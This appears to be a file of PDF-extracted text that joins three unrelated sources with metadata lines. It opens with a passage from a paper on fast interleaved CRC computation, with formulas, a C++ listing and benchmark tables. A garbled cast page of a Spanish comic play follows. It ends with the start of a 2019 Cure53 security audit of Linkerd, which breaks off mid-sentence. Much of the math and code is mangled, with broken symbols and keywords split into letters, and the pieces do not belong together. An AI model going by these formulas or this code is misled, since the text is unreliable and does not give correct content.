0\u0000\nM0\nn(x); v0;n(x)\u0001\nmay be computed incre-\n17mentally:\nvk+1;n(x) = CRC 0\u0000\nfk;n(x); vk;n(x)\u0001\n=\n= CRC 0\u0000\nmk;n(x)\u0001x(N\u00001)W; vk;n(x)\u0001\n=\n=\u0010\nvk;n(x)\u0001xNW+mk;n(x)\u0001x(N\u00001)W\u0001xD\u0011\nmodP(x) =\n=\u0010\nvk;n(x)\u0001xW+mk;n(x)\u0001xD\u0011\n\u0001x(N\u00001)WmodP(x) = (16)\n= CrcWordN\u0000\nmk;n(x); vk;n(x)\u0001\n: (17)\nThis approach:\n1. Creates Nindependent data \rows: computation of vk;0; : : : ; v k;N\u00001may\nbe performed truly in parallel. There are no contentions on a single data\nsource or destination like those the word-by-word CRC computation de-\nscribed in section 4.9 su\u000bered from.\n2. Input data is accessed sequentially. Therefore, the load on cache sub-\nsystem and false cache collisions are minimal. Thus, the performance\nbottlenecks of approach described in 4.10 are eliminated.\n4.11.2 Combining individual CRCs\nOnce vK;n(x) = CRC 0\u0000\nM0\nn(x); v0;n(x)\u0001\nare computed starting with\nv0;0=v(x);\nv0;n= 0; n\u00151;\nby de\fnition (7) of CRC 0and relationship (15),\nCRC 0\u0000\nM(x); v(x)\u0001\n= CRC 0 N\u00001X\nn=0M0\nn(x)\u0001x\u0000nW; v(x)!\n=\n=N\u00001X\nn=0CRC 0\u0000\nM0\nn(x)\u0001x\u0000nW; v0;n(x)\u0001\n=\n=N\u00001X\nn=0CRC 0\u0000\nM0\nn(x); v0;n(x)\u0001\n\u0001x\u0000nW=\n=N\u00001X\nn=0vK;n(x)\u0001x\u0000nW: (18)\nEven though this step is performed only once per input message, it still\nrequires ( N\u00001) non-trivial multiplications modulo P(x) negatively a\u000becting\nthe performance on small input messages. Also, (18) uses the multiplicative\ninverse of xnWmodulo P(x) which does not exists when P(x) mod x= 0.\n18There is more e\u000ecient and elegant solution. Assume that M(x) is followed\nby one more group gK(x). Then\nCRC 0\u0000\nM(x)\u0001xNW+gK(x); v(x)\u0001\n=\n= CRC 0\u0010\ngK(x);CRC 0\u0000\nM(x); v(x)\u0001\u0011\n=\n=\u0010\nCRC 0\u0000\nM(x); v(x)\u0001\n\u0001xNW+gK(x)\u0001xD\u0011\nmodP(x) =\n= \nxNWN\u00001X\nn=0vK;n(x)\u0001x\u0000nW+xDN\u00001X\nn=0mK;n(x)\u0001x(N\u00001\u0000n)W!\nmodP(x) =\n= \nxWN\u00001X\nn=0vK;n(x)\u0001x(N\u00001\u0000n)W+xDN\u00001X\nn=0mK;n(x)\u0001x(N\u00001\u0000n)W!\nmodP(x)\n=N\u00001X\nn=0\u0010\nvK;n(x)\u0001xW+mK;n(x)\u0001xD\u0011\n\u0001x(N\u00001\u0000n)WmodP(x) = (19)\n=N\u00001X\nn=0CRC 0\u0000\nmK;n(x); vK;n(x)\u0001\n\u0001x(N\u00001\u0000n)WmodP(x): (20)\n(20) may be implemented using formula (13) by setting v0\n0= 0, and then for\nn= 0; : : : ; N\u00001 computing\nv0\nn+1(x) =\u0010\u0000\nv0\nn(x) +vK;n\u0001\n\u0001xW+mK;n\u0001xD\u0011\nmodP(x)\n= CRC 0\u0000\nmK;n; v0\nn(x) +vK;n\u0001\n:\nAlternatively, this step may be performed using the less e\u000ecient technique\ndescribed in section 4.8.\n4.11.3 E\u000ecient computation of individual CRCs\nGiven v(x), deg\u0000\nv(x)\u0001\n< D andm(x), deg\u0000\nm(x)\u0001\n< W ,\nCrcWordN\u0000\nm(x); v(x)\u0001\n=\u0010\nv(x)\u0001xW+m(x)\u0001xD\u0011\n\u0001x(N\u00001)WmodP(x)\nmay be implemented e\u000eciently utilizing the techniques described in sections\n4.6, 4.8, and 4.9. When D\u0014W,\nCrcWordN\u0000\nm(x); v(x)\u0001\n=\u0010\nv(x)\u0001xW+m(x)\u0001xD\u0011\n\u0001x(N\u00001)WmodP(x) =\n=\u0010\nv(x)\u0001xW\u0000D+m(x)\u0011\n\u0001x(N\u00001)W+DmodP(x);\nand may be implemented using the table-driven multiplication as described in\n(13) except that the operand is multiplied by x(N\u00001)W+Dinstead of xD. Like in\n(8), explicit multiplication of v(x) byxW\u0000Dis not required since D-normalized\n19representation of v(x), viewed as a W-normalized representation, is equal to\u0000\nv(x)\u0001xW\u0000D\u0001\n.\nUsing the same technique as in formula (9), for D\u0015Wlet\nvH(x) =\u0016v(x)\nxD\u0000W\u0017\n; deg\u0000\nvH(x)\u0001\n< W;\nvL(x) =v(x) mod xD\u0000W; deg\u0000\nvL(x)\u0001\n< D\u0000W;\nso that v(x) =vL(x) +vH(x)\u0001xD\u0000W. Then,\nCrcWordN\u0000\nm(x); v(x)\u0001\n=\n=\u0010\nv(x)\u0001xW+m(x)\u0001xD\u0011\n\u0001x(N\u00001)WmodP(x) =\n=\u0010\u0000\nvL(x) +vH(x)\u0001xD\u0000W\u0001\n\u0001xW+m(x)\u0001xD\u0011\n\u0001x(N\u00001)WmodP(x) =\n=\u0010\nvL(x)\u0001xW+\u0000\nvH(x) +m(x)\u0001\n\u0001xD\u0011\n\u0001x(N\u00001)WmodP(x) =\n=\u0010\u0000\nvH(x) +m(x)\u0001\n\u0001x(N\u00001)W+DmodP(x)\u0011\n+\n+\u0010\u0000\nvL(x)\u0001xW\u0001\n\u0001x(N\u00001)WmodP(x)\u0011\n: (21)\nSince deg\u0000\nvH(x)+m(x)\u0001\n< W , the \frst summand of CrcWordN\u0000\nm(x); v(x)\u0001\n,\n\u0010\u0000\nvH(x) +m(x)\u0001\n\u0001x(N\u00001)W+DmodP(x)\u0011\n;\nmay be computed using the table-driven multiplication technique described in\n(13) except that the operand is multiplied by xD+(N\u00001)Winstead of xD.\nComputation of the second summand of CrcWordN\u0000\nm(x); v(x)\u0001\n,\n\u0010\u0000\nvL(x)\u0001xW\u0001\n\u0001x(N\u00001)WmodP(x)\u0011\n;\nis somewhat less intuitive. Since deg\u0000\nvL(x)\u0001\n< D\u0000W,\n\u0000\nvL(x)\u0001xW\u0001\nmodP(x) =\u0000\nvL(x)\u0001xW\u0001\n;\nand may be computed by shifting vL(x) byWbits. Additional multiplication\nbyx(N\u00001)Wis accomplished by adding\u0000\nvL(x)\u0001xW\u0001\n, produced at step n < N\u00001\nof the algorithm described by formula (17), to the value of vk;n+1(x) which will\nbe additionally multiplied by x(N\u00001)Was shown in formula (16).\nForn=N\u00001, the value of\u0000\nvL(x)\u0001xW\u0001\nshould be added to the value of\nvk+1;n0(x) where n0= 0. For k < K , it will be multiplied by x(N\u00001)Wduring\nnext round of parallel computation as shown in (16). For k=K,vk+1;n0(x)\nwill be multiplied by x(N\u00001)Wduring CRC concatenation as shown in (19) since\nn0= 0.\n201 Crc CrcInterleavedWordByWord (\n2 Word\u0003data , i n t blocks , Crc v , Crc u) f\n3 Crc crc [N+1] = f0g;\n4 crc [ 0 ] = v ^ u ;\n5 f o r ( i n t i = 0 ; i <N\u0003( blocks\u00001) ; i += N)f\n6 Word b u f f e r [N ] ;\n7 // Load next N words and move overflow\n8 // b i t s into \" next \" word .\n9 f o r ( i n t n = 0 ; n <N; ++n)f\n10 b u f f e r [N] = crc [ n ] ^ data [ i + n ] ;\n11 i f (D >s i z e o f (Word) \u00038)\n12 crc [ n+1] ^= crc [ n ] >>( s i z e o f (Word) \u00038) ;\n13 crc [ n ] = 0 ;\n14g\n15 // Compute i n t e r l e a v e d word \u0000by\u0000word CRC.\n16 f o r ( i n t byte = 0 ; byte <s i z e o f (Word) ; ++byte ) f\n17 f o r ( i n t n = 0 ; n <N; ++n)f\n18 crc [ n ] ^=\n19 MulInterleavedWordByXpowD [ byte ] [ ( Byte ) b u f f e r [ n ] ] ;\n20 b u f f e r [ n ] > >= 8 ;\n21g\n22g\n23 // Combine crc [ 0 ] with delayed overflow b i t s .\n24 crc [ 0 ] ^= crc [N ] ;\n25 crc [N] = 0 ;\n26g\n27 // Process the l a s t N bytes and combine CRCs.\n28 f o r ( i n t n = 0 ; n <N; ++n)f\n29 i f (n != 0) crc [ 0 ] ^= crc [ n ] ;\n30 Crc WordCrc = CrcOfWord( crc [ 0 ] ^ data [ i + n ] ) ;\n31 i f (D >s i z e o f (Word) \u00038)f\n32 crc [ 0 ] > >= D\u0000s i z e o f (Word) \u00038 ;\n33 crc [ 0 ] ^= WordCrc ;\n34ge l s ef\n35 crc [ 0 ] = WordCrc ;\n36g\n37g\n38 return ( crc [ 0 ] ^ u) ;\n39g\n40 void InitInterleavedWordTables ( void ) f\n41 f o r ( i n t byte = 0 ; byte <s i z e o f (Word) ; ++byte ) f\n42 Crc m = XpowN(D \u00008 + N\u0003s i z e o f (Word)\u00038\u00008\u0003byte ) ;\n43 f o r ( i n t i = 0 ; i <256; ++i )f\n44 MulInterleavedWordByXpowD [ byte ] [ i ] =\n45 MultiplyUnnormalized ( i , 8 , m) ;\n46g\n47g\n48g\nListing 6: Interleaved, word by word CRC computation\n215 Experimental results\nThe tests were performed using Intel Q9650 3.0GHz CPU, DDR2-800 memory\nwith 4-4-4-12 timing, and a motherboard with an Intel P45 chipset.\n5.1 Testing methology\nAll tests were performed using random input data over various block sizes. The\ncode for all evaluated algorithms was heavily optimized. Tests were performed\non both aligned and non-aligned input data to ensure that misaligned inputs do\nnot carry performance penalty. CRC tables were aligned on 256-byte boundary.\nTests were performed with warm data and warm CRC tables: as shown in\n[KB05], the footprint of CRC tables { as long as they \ft into L1 cache { is not\na major contributor to the performance.\nPerformance was measured in number of CPU cycles per byte of input data:\napparently, performance of CRC computation is bounded by performance of\nCPU and its L1 cache latency. Spot testing of few other Intel and AMD CPU\nmodels showed little variation in performance measured in CPU cycles per byte\ndespite substential di\u000berences in CPU clock frequencies.\nTo minimize performance variations caused by interference with OS and\nother applications (context switches, CPU migrations, CPU cache \rushes, mem-\nory bus interference from other processes, etc.), the test applications were run\nat high priority, each test was executed multiple times, and the minimum time\nwas measured. That allowed the tests to achieve repeatability within \u00061%.\n5.2 Compiler comparison\nDespite CRC code being rather straightforward, there were surprises (see tables\n5 and 4).\nOn 64-bit AMD64 platform, Microsoft CL compiler (version 15.00.30729)\nconsistently and noticeably generated the fastest code that used general-purpose\ninteger arithmetics. For instance, CRC-64 and CRC-32 code generated by CL\nwas 1.24 times faster than the code generated by Intel's ICL 11.10.051, and\n1.74 times faster than the code generated by GCC 4.5.0. A tuned, hand-written\ninline assembler code for CRC-32 and CRC-64 for GCC was as fast as the code\ngenerated by CL.\nWhen it comes to arithmetics with the use of SSE2 intrinsic functions on\n64-bit AMD64 platform, the code generated by GCC 4.5.0 consistenly outper-\nformed the code generated by Microsoft and Intel compilers { by factor of 1.15\nand 1.30 respectively. However, earlier versions of GCC did not produce e\u000ecient\nSSE2 code either. For that reason, pre-4.5.0 versions of GCC use hand-written\ninline assember code which was as fast as the code generated by GCC 4.5.0.\nOn 32-bit bit X86 platform, neither compiler was able to generate e\u000ecient\ncode (most likely because because the compilers could not overcome scarsity of\ngeneral-purpose registers). Performance of the code that used MMX intrinsic\n22functions was better but still not as good as hand-written assember versions,\nwhich were provided for all compilers.\nThe fastest code for 128-bit CRC on X86 platform was generated by GCC\n4.5.0.\n5.3 Choice of interleave level\nNumber of data streams processed by interleaved, word-by-word CRC computa-\ntion described in section 4.11 should matter. Too few means underutilization of\navailable ALUs. Too many will increase the length of the main loop and stress\ninstruction decoders, and may cause splilling of registers containing hot data\n(interleaved processing of Nwords of data uses at least (2 N+ 2) registers).\nAs table 3 shows, the optimal number of interleaved data streams on modern\nIntel and AMD CPUs for integer arithmetics is either 3 or 4 (likely because they\nall have exactly 3 ALUs). However, for SSE2 arithmetics on AMD64 platform\nthe optimal number of streams is 6 (3 on X86), which is quite counter-intuitive\nresult as it does not correlate with the number of available ALUs. Good old\nperformance mantra \"you need to measure\" still applies.\n5.4 Performance of CRC algorithms\nAverage performance of best variants of CRC algorithms for 64-bit AMD64 and\n32-bit X86 platforms processing 1KB, 2KB, . . . , 1MB inputs is given in tables\n1 and 1 respectively. Proposed interleaved multiword CRC algorithm is 1.7-2.0\ntimes faster that current state of the art \\slicing\".\nAs demonstrated in tables 7 and 6, interleaved word-by-word CRC described\nin section 4.11, running at 1.2 CPU cycles/byte, is 1.8 times faster than 2.1 CPU\ncycles/byte achieved by current state of the art word-by-word CRC algorithm\n(\\slicing\") described in [KB05].\nOn 64-bit AMD64 platform, the best performance was achieved using 64-bit\nreads and 64-bit tables for all variants of N-bit CRC for N\u001464. In particular,\ntables 7 and 6 clearly show that performance of 32-bit and 64-bit CRCs is nearly\nidentical. Consequently, there is no reason to favor CRC-32 over CRC-64 for\nperformance reasons.\nThe use of MMX on the 32-bit X86 platform allowed to utilize 64-bit tables\nand 64-bit reads achieving 1.3 CPU cyles/byte. Neither compiler generated\ne\u000ecient code using MMX intrinsic functions, so inline assembler was used.\nWith the use of SSE2 intrinsics on AMD64 architecture, 128-bit CRC may\nbe computed takes at 1.7 CPU cycles/byte using the new algorithm (see table\n9), compared with 2.9 CPU cycles/byte achieved by word-by-word CRC compu-\ntation (see table 8). On the 32-bit X86 architecture, the use of SSE2 intrinsics\nand GCC 4.5.0 allowed the computation of 128-bit CRC at 2.1 CPU cycles/byte,\ncompared with 4.2 CPU cycles/byte delivered by word-by-word algorithm.\nGiven that MD5 computation takes 6.8-7.1 CPU cycles/byte and SHA-1\ntakes 7.6-7.9 CPU cycles per byte, CRCs are still the algorithm of choice for\ndata corruption detection.\n23References\n[Bla93] Richard Black. Fast CRC32 in software. http://www.cl.cam.ac.\nuk/research/srg/bluebook/21/crc/crc.html , 1993.\n[BW01] Florian Braun and Marcel Waldvogel. Fast incremental\nCRC updates for IP over ATM networks. Technical Re-\nport WUCS-01-08, Washington University in St. Louis, April\n2001. Available at http://marcel.wanda.ch/Publications/\nbraun01fast-techreport.pdf .\n[GGO+10] Vinodh Gopal, Jim Guilford, Erdinc Ozturk, Gil Wolrich, Wajdi\nFeghali, Martin Dixon, and Deniz Karakoyunlu. Fast CRC computa-\ntion for iSCSI polynomial using CRC32 instruction. Intel White Pa-\nper 323405, February 2010. Available at http://download.intel.\ncom/design/intarch/papers/323405.pdf .\n[Has01] M. A. Hasan. E\u000ecient computation of multiplicative inverses for\ncryptographic applications. In ARITH '01: Proceedings of the 15th\nIEEE Symposium on Computer Arithmetic , page 66, Washington,\nDC, USA, 2001. IEEE Computer Society.\n[Hil79] John R. Hill. A table driven approach to cyclic redundancy check\ncalculations. SIGCOMM Comput. Commun. Rev. , 9(2):40{60, 1979.\n[JK02] H. Michael Ji and Eeal Killian. Fast parallel crc algorithm and\nimplementation on a con\fgurable processor. In ICC, volume 3, pages\n1813{1817, April 2002.\n[KB05] Michael E. Kounavis and Frank L. Berry. A systematic ap-\nproach to building high performance, software-based, CRC gen-\nerators. http://www.intel.com/technology/comms/perfnet/\ndownload/CRC_generators.pdf , 2005.\n[PB61] W.W. Peterson and D.T. Brown. Cyclic codes for error detection.\nInIRE(1) , volume 49, pages 228{235, January 1961.\n[Per83] Aram Perez. Byte-wise CRC calculations. IEEE Micro , 3(3):40{50,\n1983.\n[Sar88] Dilip V. Sarwate. Computation of cyclic redundancy checks via table\nlook-up. Commun. ACM , 31(8):1008{1013, 1988.\n[Zem90] Pavel Zemtsov. Proprietary copy protection system. Personal com-\nmunication, August 1990.\n24Table 1: CRC performance, AMD64 platform\nMethod Slicing1Multiword2Improvement\nCRC-32 2:0831:164;51.79\nCRC-64 2:0931:164;51.79\nCRC-128 2:9141:684;61.73\nTable 2: CRC performance, X86 platform\nMethod Slicing1Multiword2Improvement\nCRC-32 2:5231:293;71.96\nCRC-64 3:2831:293;72.55\nCRC-128 4:1742:104;81.98\nAverage number of CPU cycles per byte processing 1KB, 2KB, . . . , 1MB inputs.\nWarm data, warm tables.\n1\\Slicing\" implements the algorithm described in section 4.9.\n2\\Multiword/ N\"implements algorithm described in section 4.11 processing N\ndata streams in parallel in interleaved manner.\n3Microsoft CL 15.00.30729 compiler, \\-O2\" \rag.\n4GCC 4.5.0 compiler, \\-O3\" \rag.\n5Multiword/ N= 4, hand-written inline assembler.\n6Multiword/ N= 6, C++.\n7Multiword/ N= 4, hand-written MMX inline assember.\n8Multiword/ N= 3, C++.\nTable 3: Interleaved multiword CRC: choosing the number of stripes N\nCRC Platform N=2 N=3 N=4 N=5 N=6 N=7 N=8\nCRC-649AMD64 1.42 1.23 1.17 1.46 2.08 2.59 2.73\nCRC-12810AMD64 2.07 1.84 1.76 1.70 1.68 1.75 1.79\nCRC-12810X86 2.56 2.10 2.46 2.61 2.52 2.62 2.57\nAverage number of CPU cycles per byte processing 1KB, 2KB, . . . , 1MB inputs.\nInterleaved word-by-word CRC computation as described in section 4.11. Warm\ndata, warm tables.\n9Microsoft CL 15.00.30729 compiler, AMD64 platform, C++ code.\n10GCC 4.5.0 compiler, AMD64 platform, C++ code.\n25Table 4: Compiler comparison: Multiword/4 64-bit CRC\nInput size 64 256 1K 4K 16K 64K 256K 1M\nGCC/C++ 2.30 2.10 2.04 2.03 2.03 2.05 2.05 2.07\nICL 2.19 1.62 1.49 1.46 1.45 1.45 1.46 1.46\nCL 1.75 1.29 1.18 1.15 1.17 1.18 1.18 1.18\nGCC/ASM 1.65 1.26 1.17 1.15 1.16 1.17 1.17 1.17\nTable 5: Compiler comparison: Multiword/6 128-bit CRC\nInput size 64 256 1K 4K 16K 64K 256K 1M\nCL 4.08 2.94 2.64 2.62 2.59 2.59 2.59 2.62\nICL 3.48 2.50 2.25 2.08 2.02 2.00 2.00 2.02\nGCC 2.90 1.93 1.85 1.72 1.65 1.63 1.63 1.63\nNumber of CPU cycles per byte. 128-bit CRC (CRC-128/IEEE polynomial) and\n64-bit CRC (CRC-64-ECMA-182 polynomial) respectively. 64-bit platform, 64-\nbit reads. Warm data, warm tables.\nMicrosoft CL 15.00.30729 compiler was used with \\-O2\" \rag. Intel ICL\n11.10.051 and GCC 4.5.0 were used with \\-O3\" \rag.\n01234567\nCL-128\nICL-128\nGCC-128\nGCC-64\nICL-64\n00.511.522.533.544.55\nCL-128\nICL-128\nGCC-128\nGCC-64\nICL-64\nCL-64\n\\Multiword/ N\"implements algorithm described in section 4.11 processing N\ndata streams in parallel in interleaved manner.\n26Table 6: CRC-32 performance\nInput size 64 256 1K 4K 16K 64K 256K 1M\nSarwate 6.61 6.62 6.70 6.68 6.67 6.66 6.67 6.75\nBlack 5.44 5.46 5.47 5.48 5.47 5.46 5.47 5.53\nSlicing 2.15 2.10 2.09 2.09 2.08 2.08 2.08 2.10\nBlockword/3 2.27 2.14 2.15 2.13 2.13 1.55 1.39 1.31\nMultiword/4 1.75 1.29 1.18 1.16 1.17 1.18 1.18 1.18\nNumber of CPU cycles per byte. 32-bit CRC (CRC-32C polynomial), 64-bit\nplatform, 64-bit tables, 64-bit reads (except Sarwate). Microsoft CL 15.00.30729\ncompiler. Warm data, warm tables.\n01234567\nSarwate\nBlack\nSlicing\nBlockword/3\nMultiword/4\n\\Sarwate\" implements the algorithm described in section 4.6.\n\\Black\" implements the algorithm described in section 4.8.\n\\Slicing\" implements the algorithm described in section 4.9.\n\\Blockword/3\" implements the algorithm described in section 4.10 with 3 stripes\nof 15,376 bytes each.\n\\Multiword/4\" implements the algorithm described in section 4.11 processing 4\ndata streams in parallel in interleaved manner.\n27Table 7: CRC-64 performance\nInput size 64 256 1K 4K 16K 64K 256K 1M\nSarwate 6.61 6.62 6.70 6.68 6.67 6.65 6.66 6.75\nBlack 5.44 5.46 5.47 5.47 5.47 5.47 5.47 5.53\nSlicing 2.16 2.08 2.09 2.10 2.08 2.08 2.08 2.09\nBlockword/3 2.27 2.14 2.15 2.13 2.13 1.59 1.41 1.33\nMultiword/4 1.75 1.29 1.18 1.15 1.17 1.18 1.18 1.18\nNumber of CPU cycles per byte. 64-bit CRC (CRC-64-ECMA-182 polynomial),\n64-bit platform, 64-bit tables, 64-bit reads (except Sarwate). Microsoft CL\n15.00.30729 compiler. Warm data, warm tables.\n00.511.522.53\nSlicing\nBlockword/3\nMultiword/4\n\\Sarwate\" implements the algorithm described in section 4.6.\n\\Black\" implements the algorithm described in section 4.8.\n\\Slicing\" implements the algorithm described in section 4.9.\n\\Blockword/3\" implements the algorithm described in section 4.10 with 3 stripes\nof 15,376 bytes each.\n\\Multiword/4\" implements the algorithm described in section 4.11 processing 4\ndata streams in parallel in interleaved manner.\n28Table 8: CRC-128 performance: Slicing CRC\nInput size 64 256 1K 4K 16K 64K 256K 1M\nCL/SSE2 4.02 3.81 4.01 4.05 4.13 4.18 4.20 4.24\nICL/SSE2 3.40 3.24 3.57 3.59 3.68 3.72 3.75 3.81\nGCC/UINT 3.45 3.24 3.36 3.48 3.61 3.64 3.67 3.72\nGCC/SSE2 2.67 2.48 2.63 2.79 2.97 2.99 2.99 3.03\nTable 9: CRC-128 performance: Multiword CRC\nInput size 64 256 1K 4K 16K 64K 256K 1M\nGCC/UINT/3 3.83 3.02 3.04 3.01 3.00 2.98 2.98 3.00\nCL/SSE2/5 4.08 2.56 2.43 2.25 2.20 2.19 2.18 2.20\nICL/SSE2/5 3.52 2.33 2.23 2.05 2.00 1.99 1.99 2.01\nGCC/SSE2/6 2.90 1.93 1.85 1.72 1.65 1.63 1.63 1.63\nNumber of CPU cycles per byte. 128-bit CRC (CRC-128/IEEE polynomial),\n64-bit platform, 128-bit tables, 64-bit reads. Warm data, warm tables.\nAll compilers were tested using SSE2 intrinsics (/SSE2 variants). GCC was also\ntested using 128-bit integers provided by the compiler (GCC/UINT).\n012345\nCL/Slicing/SSE2\nICL/Slicing/SSE2\nGCC/Slicing/UINT\nGCC/Slicing/SSE2\nGCC/Multiword/UINT/3\nCL/Multiword/SSE2/5\nICL/Multiword/SSE2/5\nGCC/Multiword/SSE2/6\n\\Slicing\" implements algorithm described in section 4.9.\n\\Multiword/ N\"implements algorithm described in section 4.11 processing N\ndata streams in parallel in interleaved manner. The optimal (for given compiler)\nvalue of Nwas used.\n29" } ]
{ "category": "Orchestration & Management", "file_name": "adivorciarsetoca00cape.pdf", "project_name": "MetalLB", "subcategory": "Service Proxy" }
[ { "data": ",_:_._;._7A6SACTOSCÓMICOS\\DE.PeLLAvLUCIO\nICubiertadeesteLoretoPradoEnriqueChicoteyFranciscoMelgares\nde¡Adivorciarsefocan!\n123JACINTO^APELLAYJOSÉDESLUCIÓ¡ADIVORCIARSETOCJUGUETECÓMICO,ENTRESACTOSORIGINALEst/enadoenelTeatroCómico,deMadrid,eldía10deDiciembredeANTONIOMt>****3^'AÑOVI|5DEMARZODE1932MADRIDNÚM.234\nREPARTOPERSONAJESACTORESValentinaLoretoPrado.CristinaConsueloNieva.EsmeraldinaCarmenL.SolíaJenaraJuliaMedero.LiberadaPePitadelCid-PetraLuisaMelchor.1>eresaJosefinaInfiesta.BiasaEmiliadelCid.Mcasia..'..'..AmaliaAnchorena.LudaNatividadRodrigue».PascasioEnriqueChicote.TeodoioFranciscoMelgares.AmadorJoséCuenca.CiríacoJoKéSampietro.ManoloRodolfoRecober.BenignoJoséLuciaFedericoAntonioMartínez.Miguel-JoséDelgado.BenitoJuanJiménezRomero.LaacciónenMadrid.—Épocaactual.-^Acotacionesdelladodelactor.Nqta.—Lascuatroúltimasmujeresyloscincoúltimoshombresadmiteneldoble.\n" } ]
{ "category": "Orchestration & Management", "file_name": "SECURITY_AUDIT.pdf", "project_name": "Linkerd", "subcategory": "Service Mesh" }
[ { "data": " Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nPentest-Report Linkerd2 & Linkerd2 Proxy 06.2019\nCure53, Dr.-Ing. M. Heiderich, M. Wege, Prof. N. Kobeissi, N. Hippert, J. Larsson,\nBSc. J. Hector, BSc. T.-C. “Filedescriptor” Hong\nIndex\nIntroduction\nScope\nTest Methodology\nPart 1. Manual code auditing\nPart 2. Code-assisted penetration testing\nMiscellaneous Issues\nLNK-01-001 Dashboard: General HTTP security headers missing (Info)\nLNK-01-002 Dashboard: Missing DNS Rebinding attack protection (Low)\nConclusions\nIntroduction\n“Linkerd is a service mesh for Kubernetes and other frameworks. It makes running\nservices easier and safer by giving you runtime debugging, observability, reliability, and\nsecurity—all without requiring any changes to your code.”\nFrom https://linkerd.io/2/overview/\nThis report documents the results of a security assessment targeting the Linkerd\ncomplex. Carried out by Cure53 in June 2019, this project entailed both a penetration\ntest and a source code audit, which specifically investigated Linkerd, the Linkerd Proxy\nand the gRPC API bindings. It should also be noted that this security-centered\nexamination was requested and sponsored by The Linux Foundation/CNCF.\nAs for the resources, a total of seven Cure53 testers completed this project by spending\na total of eighteen days on analyzing the scope with a wide range of approaches. The\nguiding methodology was, by default, white-box because all sources are available\npublicly. Adhering to the well-established standards, Cure53 followed a specific, two-\npronged approach of relying on source code auditing on the one hand, and executing a\nCure53, Berlin · 06/27/19 1/8 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \npenetration test, on the other. The latter targeted several remote and local instances\nwhere Linkerd is being used in the same way that it would likely be used in production.\nTo support and facilitate the project, the Linkerd in-house team helped Cure53 with\nsetting up a cluster in which Linkerd was used as intended by the maintainers. This\nhandling was very helpful in getting access to (and awareness of) a realistic test-target.\nThe communications during the test were done in a shared Slack channel, set up by\nCure53 and joined by the Linkerd developers from Buoyant. In addition to that, a scope\ndocument was shared via Google Drive and then used throughout the test in a\ncollaborative manner. The Linkerd team could add information about areas of interest\n“on the go”, which resulted in a better familiarity and clarity about scope details and other\nmatters. All these actions contributed to the Cure53’s capacity of completing all\nobjectives on time and to a high standard. With good communications in place, Cure53\nwas able to reach good coverage over the security relevant areas.\nIt became clear to Cure53 quite fast that the Linkerd codebase and implementation are\nvery robust from a security standpoint. The tested item made a very good impression\nand very few, rather marginal issues were spotted. Nevertheless, the two spotted flaws\nrelate to general weaknesses in the web interface, which could be hardened a bit better\nin Cure53’s expert opinion.\nThis report will now describe the scope in more detail and then moves on to a\ncomprehensive overview of the test methodology and coverage. As not many findings\nhave been spotted, Cure53 uses this section to help the Linkerd maintainer team\nnavigate through the approaches and types of tests completed on the scope. Next up,\nthe two findings will be documented, alongside with recommendations about addressing\nthem in the best way possible. The report then closes with the usual conclusion in which\nCure53 describes the test as such, as well as reiterates the results and arrives at a final,\nbroader verdict of this 2019 engagement Conclusions pertinent to the general security\nposture of the Linkerd and Linkerd Proxy projects ensue.\nCure53, Berlin · 06/27/19 2/8 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nScope\n●Linkerd & Linkerd Proxy\n○https://github.com/linkerd/linkerd2 \n○https://github.com/linkerd/linkerd2-proxy \n○https://github.com/linkerd/linkerd2-proxy-api \n●Documentation\n○https://linkerd.io/2/reference/ \n●A Scope Document was shared between Linkerd Team and Cure53\nTest Methodology\nThe following paragraphs describe the testing methodology used during the audit of the\nLinkerd2 and the related, Linkerd2 Proxy-codebase. The test was divided into two\nphases, each fulfilling different goals. In the first phase, the focus was on manual source\ncode reviews needed to spot insecure code patterns. Usually issues around race\nconditions, information leakage or similar flaws can be found in this context. During the\nsecond phase, it was evaluated whether the stated security goals and premise can, in\nfact, withstand real-life attack scenarios.\nPart 1. Manual code auditing\nThis section lists the steps that were undertaken during the first phase of the audit\nagainst the Linkerd software compound. It describes the key aspects of the manual code\naudit. Since no major issues were spotted, the list portrays the thoroughness of the\npenetration test and attests the impressively high quality of the project.\n•The Linkerd documentation was extensively studied to obtain a solid overview of\nthe software compound, in particular its architecture. Cure53 sought to get a\ngrasp on the possibly problematic areas and potential attack surfaces.\n•A general audit of the Go codebase for dangerous sinks (such as command\nexecution functions) with unsanitized input was conducted.\n•The HTTP handlers of the dashboard web interface were audited for incorrect\nhandling of user-input.\n•A more in-depth look was taken at the tap interface and how the interaction\nbetween Linkerd and the Proxy takes place.\n•The file handling code serving static content was checked for common problems\nbut found to be properly dealing with the subject.\n•The gRPC API client and gRPC request generation were analyzed for common\nproblems around parameters containing special characters.\n•The JSON error handling implementation was audited for typical weaknesses but\nis avoiding the general traps.\nCure53, Berlin · 06/27/19 3/8 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n•General route mappings, the admin server interfaces/mappings and the Grafana\nroute mappings were extensively checked for edge cases.\n•The configuration file download code was evaluated for correct format handling\nand appears to be doing an impeccable job.\n•The control plane APIs were enumerated, tested for information leakage and\nwere confirmed to be read-only across the board.\n•The general HTTP handling code was analysed for known shortcomings but\nnone could be pinpointed.\n•The HTTP header handling in the Proxy code was verified to function properly\nand without falling short across errors.\n•The React code of the dashboard was checked for perilous patterns - like\ndangerouslySetInnerhtml - that could eventually lead to XSS, along with other\ntypical client-side issues (e.g. client-side path traversal). No controllable\nparameters could be identified.\n•Proxy code for handling inbound and outbound connections has been audited for\nlogical flaws. Special attention was given to header manipulation, which could\nlead to unintentional routing, as well as to the protocol detection mechanism.\n•The Grafana Proxy logic, together with the API handling logic, were investigated\nfor allowing path traversal as well as Host header injections.\n•The TLS component was audited for correct handling of secure connections, in\nparticular the parsing and serialising of certificates were scrutinized.\n•The Identity component was checked for correct handling of X.509 certificates,\nespecially as regards the creation of certificates.\n•The Healthcheck component was checked for general weaknesses of its\nimplementation concerning maintenance tests and sanity checks.\n•The Transport component of the Proxy code was audited for its application of\nTLS towards the handling of network connections.\n•The Identity component of the Proxy code was checked for correct handling of\ncertificates, especially the parsing and serializing of certificates.\n•The DNS component of the Proxy code was checked for logic weaknesses in the\nrelevant aspects resolving domain names.\nPart 2. Code-assisted penetration testing\nThe following list documents the distinguishable steps taken during 